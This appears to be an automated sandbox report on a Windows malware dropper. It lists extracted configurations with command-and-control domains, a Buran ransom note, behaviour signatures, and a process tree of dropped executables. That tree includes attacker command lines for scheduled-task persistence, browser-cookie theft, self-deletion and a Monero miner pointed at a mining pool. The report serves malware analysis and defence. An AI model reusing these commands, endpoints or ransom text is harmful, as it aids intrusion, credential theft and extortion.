Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-07-2021 18:02

General

  • Target

    d520edc59c5aee94806782d012efa7e0f905e90ce4e177f14cd612e7b8bb17ba.exe

  • Size

    2.6MB

  • MD5

    c061f6c696cde2214e0425839ae84f84

  • SHA1

    907c23a4e0aed6b887e0f7c8b16e1b4f82d1f340

  • SHA256

    d520edc59c5aee94806782d012efa7e0f905e90ce4e177f14cd612e7b8bb17ba

  • SHA512

    c0dc8dc9e5569d0db1ac6c9ac084599111f16b60cf39c230c791327304c5452df6036dbc9f0564c05a283ba369cefb87daad3714029caa4a021b94e6d88eabd6

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: udacha123@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: udacha123@mail2tor.com telegram @udacha123yes 100$=24 hour Attention !!! in 24 hours the price will increase 3 times !!! have time to pay Your personal ID: 8D9-1A6-BD4 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

udacha123@mail2tor.com

Extracted

Family

vidar

Version

39.7

Botnet

933

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Ani

C2

yoshelona.xyz:80

Extracted

Family

redline

Botnet

723

C2

qumaranero.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

903

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    903

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 4 IoCs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 23 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2852
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2628
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2620
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2424
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2416
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1844
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1412
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1252
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1232
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1080
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:860
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:1000
                        • C:\Users\Admin\AppData\Local\Temp\d520edc59c5aee94806782d012efa7e0f905e90ce4e177f14cd612e7b8bb17ba.exe
                          "C:\Users\Admin\AppData\Local\Temp\d520edc59c5aee94806782d012efa7e0f905e90ce4e177f14cd612e7b8bb17ba.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3492
                          • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\setup_install.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1832
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sahiba_1.exe
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:196
                              • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_1.exe
                                sahiba_1.exe
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1196
                                • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_1.exe" -a
                                  5⤵
                                  • Executes dropped EXE
                                  PID:3432
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sahiba_2.exe
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1956
                              • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_2.exe
                                sahiba_2.exe
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3952
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sahiba_3.exe
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2296
                              • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_3.exe
                                sahiba_3.exe
                                4⤵
                                • Executes dropped EXE
                                PID:3124
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 928
                                  5⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3928
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sahiba_4.exe
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1136
                              • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_4.exe
                                sahiba_4.exe
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:2100
                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:3312
                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4156
                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4820
                                  • C:\Users\Admin\AppData\Local\Temp\askinstall54.exe
                                    "C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4228
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:5112
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        8⤵
                                        • Kills process with taskkill
                                        PID:4552
                                  • C:\Users\Admin\AppData\Local\Temp\Chrome2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4288
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                      7⤵
                                        PID:5060
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          8⤵
                                          • Executes dropped EXE
                                          PID:3880
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                          8⤵
                                          • Creates scheduled task(s)
                                          PID:3836
                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:5012
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                          8⤵
                                            PID:2352
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                              9⤵
                                              • Creates scheduled task(s)
                                              PID:5580
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                            8⤵
                                              PID:4836
                                              • C:\Users\Admin\AppData\Roaming\services64.exe
                                                "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                9⤵
                                                • Suspicious use of SetThreadContext
                                                PID:4212
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                  10⤵
                                                    PID:4704
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                      11⤵
                                                      • Creates scheduled task(s)
                                                      PID:4984
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=http://xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=80
                                                    10⤵
                                                      PID:4580
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=http://xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=80
                                                  8⤵
                                                    PID:5992
                                              • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:4532
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:3880
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:804
                                                • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4684
                                                  • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                    C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4000
                                                • C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4760
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sahiba_5.exe
                                            3⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2988
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_5.exe
                                              sahiba_5.exe
                                              4⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2096
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sahiba_6.exe
                                            3⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3760
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4AD1A374\sahiba_6.exe
                                              sahiba_6.exe
                                              4⤵
                                              • Executes dropped EXE
                                              • Checks computer location settings
                                              PID:2636
                                              • C:\Users\Admin\Documents\BpLfed2q1mN1cSvJrj22_WH6.exe
                                                "C:\Users\Admin\Documents\BpLfed2q1mN1cSvJrj22_WH6.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:5080
                                              • C:\Users\Admin\Documents\qcVeBuPiuMQtnuSsC_gcFEMc.exe
                                                "C:\Users\Admin\Documents\qcVeBuPiuMQtnuSsC_gcFEMc.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:5068
                                              • C:\Users\Admin\Documents\fzBUxTyKxfdlXH1LBwETcKb_.exe
                                                "C:\Users\Admin\Documents\fzBUxTyKxfdlXH1LBwETcKb_.exe"
                                                5⤵
                                                  PID:5048
                                                  • C:\Users\Admin\Documents\fzBUxTyKxfdlXH1LBwETcKb_.exe
                                                    C:\Users\Admin\Documents\fzBUxTyKxfdlXH1LBwETcKb_.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Checks processor information in registry
                                                    • Modifies registry class
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1096
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im fzBUxTyKxfdlXH1LBwETcKb_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\fzBUxTyKxfdlXH1LBwETcKb_.exe" & del C:\ProgramData\*.dll & exit
                                                      7⤵
                                                        PID:4920
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /im fzBUxTyKxfdlXH1LBwETcKb_.exe /f
                                                          8⤵
                                                          • Kills process with taskkill
                                                          PID:4420
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 6
                                                          8⤵
                                                          • Delays execution with timeout.exe
                                                          PID:5836
                                                    • C:\Users\Admin\Documents\fzBUxTyKxfdlXH1LBwETcKb_.exe
                                                      C:\Users\Admin\Documents\fzBUxTyKxfdlXH1LBwETcKb_.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5032
                                                  • C:\Users\Admin\Documents\Ek0ZXmAZZv8naAtJnMDLBo_T.exe
                                                    "C:\Users\Admin\Documents\Ek0ZXmAZZv8naAtJnMDLBo_T.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5040
                                                    • C:\Users\Admin\Documents\Ek0ZXmAZZv8naAtJnMDLBo_T.exe
                                                      C:\Users\Admin\Documents\Ek0ZXmAZZv8naAtJnMDLBo_T.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:1100
                                                    • C:\Users\Admin\Documents\Ek0ZXmAZZv8naAtJnMDLBo_T.exe
                                                      C:\Users\Admin\Documents\Ek0ZXmAZZv8naAtJnMDLBo_T.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4628
                                                    • C:\Users\Admin\Documents\Ek0ZXmAZZv8naAtJnMDLBo_T.exe
                                                      C:\Users\Admin\Documents\Ek0ZXmAZZv8naAtJnMDLBo_T.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:1576
                                                  • C:\Users\Admin\Documents\IOOen29XGYlB529Agaj8YGOI.exe
                                                    "C:\Users\Admin\Documents\IOOen29XGYlB529Agaj8YGOI.exe"
                                                    5⤵
                                                      PID:5112
                                                      • C:\Users\Admin\Documents\IOOen29XGYlB529Agaj8YGOI.exe
                                                        C:\Users\Admin\Documents\IOOen29XGYlB529Agaj8YGOI.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:1764
                                                      • C:\Users\Admin\Documents\IOOen29XGYlB529Agaj8YGOI.exe
                                                        C:\Users\Admin\Documents\IOOen29XGYlB529Agaj8YGOI.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4720
                                                    • C:\Users\Admin\Documents\3hGieUpDuYassBmV6i72uVvr.exe
                                                      "C:\Users\Admin\Documents\3hGieUpDuYassBmV6i72uVvr.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:4316
                                                      • C:\Users\Admin\Documents\3hGieUpDuYassBmV6i72uVvr.exe
                                                        "C:\Users\Admin\Documents\3hGieUpDuYassBmV6i72uVvr.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Modifies data under HKEY_USERS
                                                        PID:5180
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 628
                                                        6⤵
                                                        • Program crash
                                                        PID:5304
                                                    • C:\Users\Admin\Documents\niLuiNtKdgdce5f8v09N7ewS.exe
                                                      "C:\Users\Admin\Documents\niLuiNtKdgdce5f8v09N7ewS.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:1172
                                                      • C:\Users\Admin\Documents\niLuiNtKdgdce5f8v09N7ewS.exe
                                                        C:\Users\Admin\Documents\niLuiNtKdgdce5f8v09N7ewS.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4984
                                                      • C:\Users\Admin\Documents\niLuiNtKdgdce5f8v09N7ewS.exe
                                                        C:\Users\Admin\Documents\niLuiNtKdgdce5f8v09N7ewS.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4188
                                                    • C:\Users\Admin\Documents\7JHi6RekechefSScMsXZ9Szb.exe
                                                      "C:\Users\Admin\Documents\7JHi6RekechefSScMsXZ9Szb.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4160
                                                      • C:\Users\Admin\Documents\7JHi6RekechefSScMsXZ9Szb.exe
                                                        C:\Users\Admin\Documents\7JHi6RekechefSScMsXZ9Szb.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:1332
                                                    • C:\Users\Admin\Documents\H7gldwlV6qr87E6F7WmoixEQ.exe
                                                      "C:\Users\Admin\Documents\H7gldwlV6qr87E6F7WmoixEQ.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:2204
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "H7gldwlV6qr87E6F7WmoixEQ.exe" /f & erase "C:\Users\Admin\Documents\H7gldwlV6qr87E6F7WmoixEQ.exe" & exit
                                                        6⤵
                                                          PID:1288
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im "H7gldwlV6qr87E6F7WmoixEQ.exe" /f
                                                            7⤵
                                                            • Kills process with taskkill
                                                            PID:2300
                                                      • C:\Users\Admin\Documents\ZWJe8T0YkvBhTcNL4kPwew4W.exe
                                                        "C:\Users\Admin\Documents\ZWJe8T0YkvBhTcNL4kPwew4W.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:4900
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im ZWJe8T0YkvBhTcNL4kPwew4W.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ZWJe8T0YkvBhTcNL4kPwew4W.exe" & del C:\ProgramData\*.dll & exit
                                                          6⤵
                                                            PID:4396
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im ZWJe8T0YkvBhTcNL4kPwew4W.exe /f
                                                              7⤵
                                                              • Kills process with taskkill
                                                              PID:3936
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              7⤵
                                                              • Delays execution with timeout.exe
                                                              PID:5800
                                                        • C:\Users\Admin\Documents\HYmufScpBctMN3fm5pWp1fkU.exe
                                                          "C:\Users\Admin\Documents\HYmufScpBctMN3fm5pWp1fkU.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:1364
                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:368
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4648
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4692
                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            PID:5024
                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4424
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:1196
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                                PID:3916
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                  PID:5692
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:3916
                                                            • C:\Users\Admin\Documents\dgY9WrMs8yJX0Lnvw0emYmnN.exe
                                                              "C:\Users\Admin\Documents\dgY9WrMs8yJX0Lnvw0emYmnN.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:3808
                                                              • C:\Users\Admin\Documents\dgY9WrMs8yJX0Lnvw0emYmnN.exe
                                                                "C:\Users\Admin\Documents\dgY9WrMs8yJX0Lnvw0emYmnN.exe" -a
                                                                6⤵
                                                                  PID:3916
                                                              • C:\Users\Admin\Documents\okZGg1BlqDrY8tlYoRuBLlXK.exe
                                                                "C:\Users\Admin\Documents\okZGg1BlqDrY8tlYoRuBLlXK.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:5008
                                                                • C:\Users\Admin\Documents\okZGg1BlqDrY8tlYoRuBLlXK.exe
                                                                  "C:\Users\Admin\Documents\okZGg1BlqDrY8tlYoRuBLlXK.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:4492
                                                              • C:\Users\Admin\Documents\arGFfKL4B5hvc8zVjxoStz7R.exe
                                                                "C:\Users\Admin\Documents\arGFfKL4B5hvc8zVjxoStz7R.exe"
                                                                5⤵
